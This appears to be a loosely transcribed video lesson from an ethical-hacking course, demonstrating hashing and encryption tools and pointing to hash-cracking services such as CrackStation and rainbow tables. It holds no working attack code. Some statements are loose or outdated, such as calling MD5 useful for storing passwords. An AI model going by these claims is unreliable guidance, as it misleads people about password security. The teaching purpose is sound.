as dollar. Now just put the dollar symbol here, here, then you just put the dollar. So you just type Control O, Control X. So you just type here clear. Now you just type here. Now we are not gonna get any type of errors. Again we got error, syntax error in policy, user policy, policy document. Okay. So I would like to get it from here. Pentester Club user policy.json. Let's see. So the create a policy when calling the policy, so it's not gonna work out. I think we try again. So once we enter all these things also, it's not work out at all. So you can try this one, your wish. I would like to make this tutorial in another way. So now come back here. So I would like to go for the last one is cryptography. So it's not even 1, 2, 3. Also we are getting error. So what is a cryptography? So cryptography, a practice of study of techniques for securing a communication and data from adversary. It involves for creating a written and generated codes that allows the information to be kept a secret. So what we are going to do in this cryptography? Encryption and decryption, key, cipher, cryptographic hash functions, type of cryptography like a symmetric cryptography, AES cryptography, and asymmetric cryptography, and hash functions, like cryptography protocols like SSL or TLS and SSH, PGP, IPsec, and what type of applications we are going to use in this. So the applications we are going to use in this like secure communication and ensuring the message and data sent over the network are only accessible to the intended recipients and data integrity. So it verifies the data and authenticity and integrate messages and software for digital documents. So blockchain and cryptocurrencies ensure the security and integrity of transaction and data within the blockchain network. So now we would like to go back here, open the big one, come back here. So we have failed that too. Now we would like to do here. So let it come back here. Cryptography. So our first tool is calculate one-way hash using hash calc. So hash functions calculate unique fixed size bit string representation called a message digest of arbitrary block of information. Message digest is one-way hash functions. Distill the information contained a file, a small or large, into a single fixed line, a number of typical between 128 to 256 bits. If any given bit of the function's input is changed, every output bit has 50% chance of changing given an input file and its corresponding message digest. It shows it should be nearly impossible to find another file with the same message digest value, as it's computationally infeasible to have two files with the same message and digester value. So we would like to come back here, process. So I would like to open as a hash key. So before opening an hash key, so I just open new text document. So just type here PCP here, Alex. So I just need to come back here, open this. So I just write as a message like hello PCP here, Alex. We just write here welcome to Pentester Club. Play hard, work hard. Keep smiling. So I just write here happy ending. So just type file, just save it, then close this. So you just need to look at the file. So the file, you just click on this three dots in the desktop. You just open this PCPL Alex, just open this. So you just need to get MD5, SHA1, SHA256, SHA512, and MD2, ALDA32. So you just click on calculate. You can see a MD5 hash value about that one. So the data is in this. So you just need to crack the data. So if you get this hash value, it's totally different. So I would like to open as same. I would like to come back here. I would like to come back this here. So I would like to open the same hash file. Just open this. So you just put it here. So you would like to open the same file. So you can see here the hash file is totally a different. So you just open this one. So MD5, SHA-1, SHA-256, SHA-512 and Alder 32. You can look here, it's look like a similarly the same hash calculator. So you can try the same like another. Once you open the same thing, it will open the same way. So I would like to open. I would like to create another one as a new notepad. As here, we just type here. Visit here, Alex. Now I would like to open this. Hello, PCPL subscribers. Keep smiling. Let me just type here. Start here PCPL Alex. Just save. Close this. Go back here. So this one. Just open. Then click on calculate. You can look here. The hash values are different. That's it. You can look here. Everything is different.
So this is how you can perform the hash calculation. So in real time, hash calculation tool is used to check the integrity of a file where the changes and hash values indicated that the file content has been modified or not. That's it. Now you would like to look here. MD5 hash calculator. What's this? Number 2. Calculate MD5 hashes using MD5 calculator. So MD2, MD4, MD5 and MD6 are the message digest algorithm used in digital signature applications to compare the document securely before the system signs it with a private key. The algorithm can be a variable length, but the resulting message digest is always 128 bits. The MD5 algorithm is widely used for cryptographic hash functions that takes a message of arbitrary length as input and output of 128-bit fingerprint of message digest of the input. The MD5 algorithm is used to a wide variety of cryptographic applications and is useful for digital signature applications, file integrity checking, and storing a passwords. MD5 calculator is a simple application that calculates MD5 hashes of a given file, and it can be used with a large files. It features a progress counters and a text field from which the final MD5 hashes that can be easily copied to the clipboard of MD5 calculator can be used to check the integrity of a file. Now you would like to open the MD5
calculator. So now we would like to click on add a files. Go to a desktop. So I would like to add this, open. So I would like to click on calculate. So we have got the same value from the hash calculator. So you just copy this one and paste it here. And I would like to compare. Okay, two MD5 hash values are equal. That's it. Now we just okay. Now I would like to open another file. So I would like to modify a little bit these things. I would like to look here, open this. So I just close this. I just save and close this. Now again open MD5 hash calculator. This also look the same. Alex, then just calculate, then you just uh, press this bar and compare. Incorrect, two MD5 hash values are not equal. So this is how you can verify here. So even if you want to look here, you just copy and paste it here, then compare. So you can see here, two MD5 hash values are equal. That's it. So now come back here. Number 3. So you just type here, calculate MD5 hashes using hash my file. So hash my files is a small utility that allows you to calculate the MD5 and SHA-1 hashes of one or more files in your system. You can easily copy the MD5 or SHA-1 hashes list into a clipboard or save them into a text or HTML or XML file. Hash my files can also be launched from the context menu of Windows Explorer also. So I already have here one here. Desktop, go to cryptography, hash my file, CFG. So just rename this one exe. So it never comes. So I would like to download this one. Come back here. So we would like to download this tool. So it's take a little bit time. Hash my files. Otherwise, I would like to get it from here. Close this. So here have hash my files. So I just close this. So you just type run. So you just need to open a file. You just open the file is click on desktop. You just open this. So you can look here MD5 SHA-1 along with the CRC32 SHA-256 SHA-512 SHA-384, the full path, unmodified time, created time, entry modified time, every single information you get, file size, file version, product version, extension with the txt, file attribute is a. So we got it all the information here. You can look here. So you can export this one also. You can look here. That's so now just close this. Perform. So our next tutorial is perform file and text message encryption using CryptoForge. So CryptoForge is a file encryption software for personal and professional data security. It allows you to protect the privacy of sensitive files and folders or emails messages by encrypting them. A strong encryption algorithm. Once the information has been encrypted, it can be stored on insecure media or transmitted on the insecure network, such as the internet, and remains private. Later, the information can be decrypted into the original form. So, I would like to write here as file new tab. I just write here open new tab, my bank data. So I just open this new tab, just type here my account number is 12345678990. My Swift code is HSBSC. Oh. So now I would like to write again like my account, sorry, my debit card number 12345678990 98754. That's enough. Now that's it. Now you just type here 5, save it. So I have saved this one. So you just close this. So I would like to go for encrypt this one. So once you have encrypt this one, passwords is like 1234, 1234. Then click on OK. Now the file is encrypted. You can see here my bank data is encrypted. The file is very securely encrypted. Now you can share to somebody else and you would like to try to open this one. That's it. So the guy also need to install the CryptoForge. Then only this file can be opened. Otherwise he cannot able to open this file until unless if you know have CryptoForge along with the password. That's it. So I would like to look now how I would like to uh, get it this one. So algorithms. So it's files we would like to look here. So I would like to open cryptoforce.txt. So I would like to open a file. Here is, I have a file. I would like to look here in the desktop. A txt file. No, I just type all files. So my bank data.txt, just open this, is encrypted. So I would like to decrypt this one, is enter the password. What else you have put? Click on open. So cannot find a beginning of block tag of the message seems to be unencrypted. So I just enter the passphrase 1234 and enter 1234. Then click on OK. Then you just cannot find beginning back tag. So the file is corrupted. That's it here. So you can open automatically like this. So now you would like to go for encrypt and decrypt the data using BC text encoder. So you would like to go for encrypt and decrypt data using BC text encoder. So BC text encoder simplifies encoding and decoding text data. Plain text data are compressed encrypted and converted to a text format, which can be which can be easily copied to the clipboard or saved as a text file. This utility software uses a publicly key encryption method and password-based encryption, as well as strong and approved symmetric and public key algorithm of data encryption. So now you would like to look here. So BTC text encoder, just run this. Just open the file from desktop, open this. So we have everything we have got it here, just copy. So we would like to choose by, so this decoded a plain text is 48 bytes, 148 bytes. So you just encode this one. Password, what else the password you would like to put here? I just put like a normal like 7890, otherwise 7890, then click on OK. The password length is too short, so otherwise I just put here UWERTY, UWERTY, then click on OK. So again it's coming 123 at the rate 123, then click on OK. So now the begin encoded message. So here is an encoded message we have find here. So I would like to type here. So just control copy, control R, copy here. So I can show you here. Just open new tab. Here, rich text document, encode data. So you can look here, paste it. So this is an encoding. So either it is like base 64 or base everything. BTC text encoder. So we can decode this one now. So this is the password. Okay. So now we would like to don't save. So we would like to type as a decode, enter the password. You just type here your password at the rate 123. Then click on OK. So decoded by password. So we have successfully decoded this one.
That's it. So I would like to give some other tools for encryption here. So for some other tools for encryption is here is, let's come back here. Our number one tool is CrackStation. So CrackStation, it will crack the MD5 hash passwords or any type of hash passwords. You can look here, crackstation.net. So it will crack LM, ATLM, MD2, MD4, MD5, MD5 hexadecimal, every type of here. It will support. It will crack every information. That's it. Now I would like to give here another one is as a rainbow table. So the rainbow table is also can crack for the any type of password of the hashes. Now we'd like to go for another one is CyberChef. It's also a good one. So it have plenty of tools in the CyberChef. You can utilize this CyberChef to performing this cryptography works. Come little bit late. You can study about these rainbow tables. So it will take a little bit time. So we have successfully completed the certified ethical hacking entirely. So you just try each and every tool. I just give every tool in the description and every information. So we have failed somewhat like executing the in system hacking, like bypassing the UAC admin of UAC bypass, and exploiting the Android and ADB server, and we have failed to access the AWS, creating I am role user. That's it here. So I apologize for that. So you can watch until the end and keep smiling. Thank you guys for watching and keep smiling.